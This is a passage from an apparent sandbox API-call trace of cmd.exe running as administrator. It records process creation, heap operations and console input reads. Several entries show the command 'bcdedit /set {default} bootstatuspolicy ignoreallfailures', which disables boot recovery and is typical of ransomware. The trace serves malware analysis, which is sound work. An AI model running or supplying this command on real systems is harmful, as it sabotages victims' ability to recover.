[0212.790] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.790] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0212.791] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0212.791] GetProcessHeap () returned 0x2e0000 [0212.791] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4640 | out: hHeap=0x2e0000) returned 1 [0212.791] GetProcessHeap () returned 0x2e0000 [0212.791] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x12) returned 0x2f9510 [0212.791] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1ef490*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ef440 | out: lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x1ef440*(hProcess=0x54, hThread=0x50, dwProcessId=0xc0, dwThreadId=0x498)) returned 1 [0212.824] CloseHandle (hObject=0x50) returned 1 [0212.824] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0212.824] GetProcessHeap () returned 0x2e0000 [0212.825] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f8980 | out: hHeap=0x2e0000) returned 1 [0212.825] GetEnvironmentStringsW () returned 0x2f8980* [0212.825] GetProcessHeap () returned 0x2e0000 [0212.825] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2fb240 [0212.825] FreeEnvironmentStringsW (penv=0x2f8980) returned 1 [0212.825] NtQueryInformationProcess (in: ProcessHandle=0x54, ProcessInformationClass=0x0, ProcessInformation=0x1eed48, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x1eed48, ReturnLength=0x0) returned 0x0 [0212.825] ReadProcessMemory (in: hProcess=0x54, lpBaseAddress=0x7fffffd7000, lpBuffer=0x1eed80, nSize=0x380, lpNumberOfBytesRead=0x1eed40 | out: lpBuffer=0x1eed80*, lpNumberOfBytesRead=0x1eed40*=0x380) returned 1 [0212.825] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0213.595] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x1ef388 | out: lpExitCode=0x1ef388*=0x0) returned 1 [0213.595] CloseHandle (hObject=0x54) returned 1 [0213.595] _vsnwprintf (in: _Buffer=0x1ef5f8, _BufferCount=0x13, _Format="%08X", _ArgList=0x1ef398 | out: _Buffer="00000000") returned 8 [0213.595] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0213.595] GetProcessHeap () returned 0x2e0000 [0213.595] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb240 | out: hHeap=0x2e0000) returned 1 [0213.595] GetEnvironmentStringsW () returned 0x2f8980* [0213.595] GetProcessHeap () returned 0x2e0000 [0213.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2fb240 [0213.595] FreeEnvironmentStringsW (penv=0x2f8980) returned 1 [0213.595] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0213.595] GetProcessHeap () returned 0x2e0000 [0213.595] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb240 | out: hHeap=0x2e0000) returned 1 [0213.595] GetEnvironmentStringsW () returned 0x2f8980* [0213.595] GetProcessHeap () returned 0x2e0000 [0213.595] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xaea) returned 0x2fb240 [0213.595] FreeEnvironmentStringsW (penv=0x2f8980) returned 1 [0213.595] GetProcessHeap () returned 0x2e0000 [0213.595] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9510 | out: hHeap=0x2e0000) returned 1 [0213.596] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ef458 | out: lpAttributeList=0x1ef458) [0213.596] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 1 [0213.598] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.598] SetConsoleMode (hConsoleHandle=0xa8, dwMode=0x0) returned 0 [0213.598] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.598] GetConsoleMode (in: hConsoleHandle=0xa8, lpMode=0x4ab3e194 | out: lpMode=0x4ab3e194) returned 0 [0213.598] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.598] GetConsoleMode (in: hConsoleHandle=0x9c, lpMode=0x4ab3e198 | out: lpMode=0x4ab3e198) returned 0 [0213.599] GetConsoleOutputCP () returned 0x1b5 [0213.599] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab4bfe0 | out: lpCPInfo=0x4ab4bfe0) returned 1 [0213.599] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0213.599] GetProcessHeap () returned 0x2e0000 [0213.599] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9d00 | out: hHeap=0x2e0000) returned 1 [0213.599] GetProcessHeap () returned 0x2e0000 [0213.599] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9be0 | out: hHeap=0x2e0000) returned 1 [0213.599] GetProcessHeap () returned 0x2e0000 [0213.599] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f5b70 | out: hHeap=0x2e0000) returned 1 [0213.599] GetProcessHeap () returned 0x2e0000 [0213.599] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2e1320 | out: hHeap=0x2e0000) returned 1 [0213.599] GetProcessHeap () returned 0x2e0000 [0213.599] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9480 | out: hHeap=0x2e0000) returned 1 [0213.599] GetProcessHeap () returned 0x2e0000 [0213.599] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2faa10 | out: hHeap=0x2e0000) returned 1 [0213.599] GetProcessHeap () returned 0x2e0000 [0213.599] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f99d0 | out: hHeap=0x2e0000) returned 1 [0213.599] GetProcessHeap () returned 0x2e0000 [0213.599] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f4610 | out: hHeap=0x2e0000) returned 1 [0213.599] GetProcessHeap () returned 0x2e0000 [0213.599] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f97c0 | out: hHeap=0x2e0000) returned 1 [0213.599] _vsnwprintf (in: _Buffer=0x4ab56340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1ef8b8 | out: _Buffer="\r\n") returned 2 [0213.599] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.599] GetFileType (hFile=0xa8) returned 0x3 [0213.599] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.599] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0213.599] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1ef888, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1ef888*=0x2, lpOverlapped=0x0) returned 1 [0213.599] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab3f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0213.599] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab4c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0213.600] _vsnwprintf (in: _Buffer=0x4ab3eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1ef8c8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0213.600] _vsnwprintf (in: _Buffer=0x4ab3eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x1ef8c8 | out: _Buffer=">") returned 1 [0213.600] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.600] GetFileType (hFile=0xa8) returned 0x3 [0213.600] _get_osfhandle (_FileHandle=1) returned 0xa8 [0213.600] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4ab4c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0213.600] WriteFile (in: hFile=0xa8, lpBuffer=0x4ab4c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1ef8b8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesWritten=0x1ef8b8*=0x14, lpOverlapped=0x0) returned 1 [0213.600] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.600] GetFileType (hFile=0x9c) returned 0x3 [0213.600] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.600] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.600] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.600] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e320, cchWideChar=1 | out: lpWideCharStr="bcdedit /set {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.600] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.600] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.600] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.600] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e322, cchWideChar=1 | out: lpWideCharStr="cdedit /set {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.600] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.600] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.600] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.600] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e324, cchWideChar=1 | out: lpWideCharStr="dedit /set {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.600] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.600] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.600] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.600] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e326, cchWideChar=1 | out: lpWideCharStr="edit /set {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.600] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.600] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.601] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e328, cchWideChar=1 | out: lpWideCharStr="dit /set {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.601] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.601] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.601] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32a, cchWideChar=1 | out: lpWideCharStr="it /set {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.601] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.601] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.601] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32c, cchWideChar=1 | out: lpWideCharStr="t /set {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.601] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.601] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.601] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e32e, cchWideChar=1 | out: lpWideCharStr=" /set {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.601] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.601] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.601] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e330, cchWideChar=1 | out: lpWideCharStr="/set {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.601] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.601] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.601] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e332, cchWideChar=1 | out: lpWideCharStr="set {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.601] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.601] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.601] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e334, cchWideChar=1 | out: lpWideCharStr="et {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.601] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.601] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.601] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.601] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e336, cchWideChar=1 | out: lpWideCharStr="t {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.602] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.602] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.602] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e338, cchWideChar=1 | out: lpWideCharStr=" {default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.602] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.602] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.602] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33a, cchWideChar=1 | out: lpWideCharStr="{default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.602] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.602] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.602] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33c, cchWideChar=1 | out: lpWideCharStr="default} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.602] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.602] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.602] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e33e, cchWideChar=1 | out: lpWideCharStr="efault} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.602] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.602] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.602] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e340, cchWideChar=1 | out: lpWideCharStr="fault} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.602] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.602] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.602] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e342, cchWideChar=1 | out: lpWideCharStr="ault} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.602] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.602] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.602] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e344, cchWideChar=1 | out: lpWideCharStr="ult} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.602] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.602] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.602] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.602] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4ab4c320, cbMultiByte=1, lpWideCharStr=0x4ab4e346, cchWideChar=1 | out: lpWideCharStr="lt} bootstatuspolicy ignoreallfailures\n") returned 1 [0213.603] _get_osfhandle (_FileHandle=0) returned 0x9c [0213.603] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0213.603] ReadFile (in: hFile=0x9c, lpBuffer=0x4ab4c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1efbb8, lpOverlapped=0x0 | out: lpBuffer=0x4ab4c320*, lpNumberOfBytesRead=0x1efbb8*=0x1, lpOverlapped=0x0) returned 1 [0213.603] 